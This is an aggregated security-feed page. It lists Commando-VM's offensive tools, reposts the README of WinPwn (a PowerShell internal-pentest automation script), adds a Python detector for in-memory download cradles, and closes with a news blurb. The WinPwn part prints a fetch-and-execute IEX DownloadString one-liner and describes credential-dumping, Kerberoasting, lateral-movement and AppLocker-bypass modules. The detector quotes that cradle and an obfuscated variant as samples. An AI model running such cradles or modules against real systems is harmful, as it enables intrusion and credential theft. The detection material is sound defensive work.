  cup all

Installed Tools
  Active Directory Tools: Remote Server Administration Tools (RSAT), SQL Server Command Line Utilities, Sysinternals
  Command & Control: Covenant, PoshC2, WMImplant, WMIOps
  Developer Tools: Dep, Git, Go, Java, Python 2, Python 3 (default), Visual Studio 2017 Build Tools (Windows 10), Visual Studio Code
  Evasion: CheckPlease, Demiguise, DotNetToJScript, Invoke-CradleCrafter, Invoke-DOSfuscation, Invoke-Obfuscation, Invoke-Phant0m, Not PowerShell (nps), PS>Attack, PSAmsi, Pafishmacro, PowerLessShell, PowerShdll, StarFighters
  Exploitation: ADAPE-Script, API Monitor, CrackMapExec, CrackMapExecWin, DAMP, Exchange-AD-Privesc, FuzzySec's PowerShell-Suite, FuzzySec's Sharp-Suite, Generate-Macro, GhostPack (Rubeus, SafetyKatz, Seatbelt, SharpDPAPI, SharpDump, SharpRoast, SharpUp, SharpWMI), GoFetch, Impacket, Invoke-ACLPwn, Invoke-DCOM, Invoke-PSImage, Invoke-PowerThIEf, Kali Binaries for Windows, LuckyStrike, MetaTwin, Metasploit, Mr. Unikod3r's RedTeamPowershellScripts, NetshHelperBeacon, Nishang, Orca, PSReflect, PowerLurk, PowerPriv, PowerSploit, PowerUpSQL, PrivExchange, Ruler, SharpExchangePriv, SpoolSample, UACME, impacket-examples-windows, vssown
  Information Gathering: ADACLScanner, ADExplorer, ADOffline, ADRecon, BloodHound, Get-ReconInfo, GoWitness, Nmap, PowerView (Dev branch included), SharpHound, SharpView, SpoolerScanner
  Networking Tools: Citrix Receiver, OpenVPN, Proxycap, PuTTY, Telnet, VMWare Horizon Client, VMWare vSphere Client, VNC-Viewer, WinSCP, Windump, Wireshark
  Password Attacks: ASREPRoast, CredNinja, DSInternals, Get-LAPSPasswords, Hashcat, Internal-Monologue, Inveigh, Invoke-TheHash, KeeFarce, KeeThief, LAPSToolkit, MailSniper, Mimikatz, Mimikittenz, RiskySPN, SessionGopher
  Reverse Engineering: DNSpy, Flare-Floss, ILSpy, PEview, Windbg, x64dbg
  Utilities: 7zip, Adobe Reader, AutoIT, Cmder, CyberChef, Gimp, Greenshot, Hashcheck, Hexchat, HxD, Keepass, MobaXterm, Mozilla Thunderbird, Neo4j Community Edition, Pidgin, Process Hacker 2, SQLite DB Browser, Screentogif, Shellcode Launcher, Sublime Text 3, TortoiseSVN, VLC Media Player, Winrar, yEd Graph Tool
  Vulnerability Analysis: Egress-Assess, Grouper2, zBang
  Web Applications: Burp Suite, Fiddler, Firefox, OWASP Zap
  Wordlists: FuzzDB, PayloadsAllTheThings, SecLists

Download Commando-Vm

Link: http://feedproxy.google.com/~r/PentestTools/~3/7vdMiUOLgeU/commando-vm-first-of-its-kind-windows.html

WinPwn – Automation For Internal Windows Penetrationtest

In many past internal penetration tests I often had problems with the existing PowerShell recon / exploitation scripts due to missing proxy support. For this reason I wrote my own script with automatic proxy recognition and integration. The script is mostly based on well-known large offensive security PowerShell projects: I only load them one after the other into RAM via IEX DownloadString and partially automate the execution to save time. It is not C#, and it may be flagged by antivirus solutions; Windows Defender, for example, blocks some of the known scripts/functions. There are different local recon modules, domain recon modules, privilege escalation and exploitation modules. Any suggestions, feedback and comments are welcome!

Just import the modules with

  Import-Module .\WinPwn_v0.7.ps1

or with

  iex (new-object net.webclient).downloadstring('https://raw.githubusercontent.com/SecureThisShit/WinPwn/master/WinPwn_v0.7.ps1')

Functions available after import:
  WinPwn -> Guides the user through all functions/modules with simple questions.
  Inveigh -> Executes Inveigh in a new console window (https://github.com/Kevin-Robertson/Inveigh); SMB relay attacks with session management afterwards.
  sessionGopher -> Executes SessionGopher and asks for parameters (https://github.com/Arvanaghi/SessionGopher).
  Mimikatzlocal -> Executes Invoke-WCMDump and Invoke-Mimikatz (https://github.com/PowerShellMafia/PowerSploit).
  localreconmodules -> Executes Get-Computerdetails, Just Another Windows Privilege Escalation Script and WINspect (https://github.com/PowerShellMafia/PowerSploit, https://github.com/A-mIn3/WINspect, https://github.com/411Hall/JAWS).
  JAWS -> Just Another Windows Privilege Escalation Script gets executed.
  domainreconmodules -> Different PowerView situational awareness functions get executed and the output is stored on disk. In addition, a user list for DomainPasswordSpray is stored on disk, and an AD report is generated as CSV files (or XLS if Excel is installed) with ADRecon (https://github.com/sense-of-security/ADRecon, https://github.com/PowerShellMafia/PowerSploit, https://github.com/dafthack/DomainPasswordSpray).
  Privescmodules -> Executes different privesc scripts in memory (Sherlock https://github.com/rasta-mouse/Sherlock, PowerUp, GPP files, WCMDump).
  lazagnemodule -> Downloads and executes lazagne.exe (if not detected by AV) (https://github.com/AlessandroZ/LaZagne).
  latmov -> Searches the domain for systems where you have admin access, for lateral movement. Mass-Mimikatz can be used afterwards on the systems found; DomainPasswordSpray for new credentials can also be used here.
  empirelauncher -> Launches a PowerShell Empire one-liner on remote systems (https://github.com/EmpireProject/Empire).
  shareenumeration -> Invoke-FileFinder and Invoke-ShareFinder from PowerView (PowerSploit).
  groupsearch -> Get-DomainGPOUserLocalGroupMapping: find systems where you have admin access or RDP access via Group Policy mapping (PowerView / PowerSploit).
  Kerberoasting -> Executes Invoke-Kerberoast in a new window and stores the hashes for later cracking.
  isadmin -> Checks for local admin access on the local system.
  Sharphound -> Downloads SharpHound and collects information for the BloodHound DB.
  adidnswildcard -> Creates an Active Directory-integrated DNS wildcard record and runs Inveigh for mass hash gathering (https://blog.netspi.com/exploiting-adidns/#wildcard).

The "oBEJHzXyARrq.exe" executable is an obfuscated version of jaredhaight's PSAttack tool for AppLocker / PowerShell restriction bypass (https://github.com/jaredhaight/PSAttack).

Todo:
  Get the scripts from my own Creds repository (https://github.com/SecureThisShit/Creds) to be independent of changes in the original repositories.
  Proxy options via PAC file are not correctly detected at the moment.

Legal disclaimer:
Usage of WinPwn for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program. Only use for educational purposes.

Download WinPwn
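The load mechanism described above (everything pulled into RAM with IEX DownloadString, nothing written to disk) is also what a blue team keys on, and since the README itself notes that Defender flags some of these scripts, it is worth seeing what that detection looks like. The following is an added example and not part of WinPwn: it classifies PowerShell script blocks, assuming script block logging (event 4104 in Microsoft-Windows-PowerShell/Operational) is enabled and that the ScriptBlockText field has already been extracted. The keyword lists and the light de-obfuscation step (backtick removal, joining 'Down'+'loadString' style fragments) are my own heuristics, sufficient against the plain cradle and its cheapest disguises, not against a proper obfuscator; the sample blocks are constructed.

```python
"""Flagging in-memory PowerShell download cradles of the kind WinPwn uses
to load its modules. Added example, not WinPwn code: it assumes script
block logging (event 4104 in Microsoft-Windows-PowerShell/Operational) is
enabled and that the ScriptBlockText field has already been pulled out of
each event."""
import re

# Ways a script block can pull remote code into memory.
DOWNLOAD_RE = re.compile(
    r"downloadstring|downloaddata|downloadfile|new-object\s+(?:system\.)?net\.webclient"
    r"|invoke-webrequest|\biwr\b|invoke-restmethod|\birm\b",
    re.I,
)
# Ways it can run that code without writing a file.
EXECUTE_RE = re.compile(r"invoke-expression|\biex\b|\[scriptblock\]::create", re.I)
HOST_RE = re.compile(r"https?://([^/\s'\"]+)", re.I)


def normalize(script):
    """Undo the cheap obfuscation seen in the wild before matching. PowerShell
    drops a backtick that escapes an ordinary letter (I`E`X runs IEX) and
    'Down'+'loadString' is just DownloadString once concatenated, so remove
    backticks, join quoted fragments and collapse whitespace. (Assumed
    heuristics: enough for keyword matching, not a parser.)"""
    s = script.replace("`", "")
    s = re.sub(r"['\"]\s*\+\s*['\"]", "", s)
    return re.sub(r"\s+", " ", s).strip()


def classify(script):
    """Return (verdict, hosts). A block that both downloads and executes is
    a cradle; download without execution is what an admin fetching an
    installer looks like; everything else is left alone."""
    s = normalize(script)
    downloads = DOWNLOAD_RE.search(s) is not None
    executes = EXECUTE_RE.search(s) is not None
    hosts = sorted({h.lower() for h in HOST_RE.findall(s)})
    if downloads and executes:
        return "download-cradle", hosts
    if downloads:
        return "download-only", hosts
    return "benign", hosts


# Constructed sample script blocks, not captured logs.
SAMPLE_BLOCKS = [
    # The load line from the WinPwn README above, verbatim.
    "iex (new-object net.webclient).downloadstring('https://raw.githubusercontent.com/"
    "SecureThisShit/WinPwn/master/WinPwn_v0.7.ps1')",
    # Same cradle with backtick and string-split obfuscation.
    "I`E`X (New-Object Net.WebClient).('Down'+'loadString')"
    "('https://raw.githubusercontent.com/example/x.ps1')",
    # An administrator fetching an installer to disk.
    "Invoke-WebRequest -Uri https://updates.example.internal/agent.msi -OutFile C:\\Temp\\agent.msi",
    # Ordinary housekeeping.
    "Get-ChildItem C:\\Windows\\Temp | Where-Object Length -gt 1MB",
]

if __name__ == "__main__":
    for block in SAMPLE_BLOCKS:
        verdict, hosts = classify(block)
        print(f"{verdict:16} {', '.join(hosts) or '-'}  {block[:60]}")
```

Because WinPwn fetches its dependencies one after another from the same session, expect a burst of cradle hits sharing one process ID rather than a single event; grouping by process and by the hosts returned makes the triage quick.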

Link: http://feedproxy.google.com/~r/PentestTools/~3/9lPHNu1cvU8/winpwn-automation-for-internal-windows.html

ASUS, Microsoft, & Tesla – Hack Naked News #212

    Zero-Days in Counter Strike client could be used to build a major botnet, huge aluminum plants hit by ‘severe’ ransomware attack, Myspace loses 50 million songs in server migration, wifi signals can reveal your password, and PuTTY in your hands: an SSH client gets patched after RSA key exchange memory vulnerability was spotted! […]
The post ASUS, Microsoft, & Tesla – Hack Naked News #212 appeared first on Security Weekly.

Link: http://feedproxy.google.com/~r/securityweekly/Lviv/~3/VrsX9vpaVWg/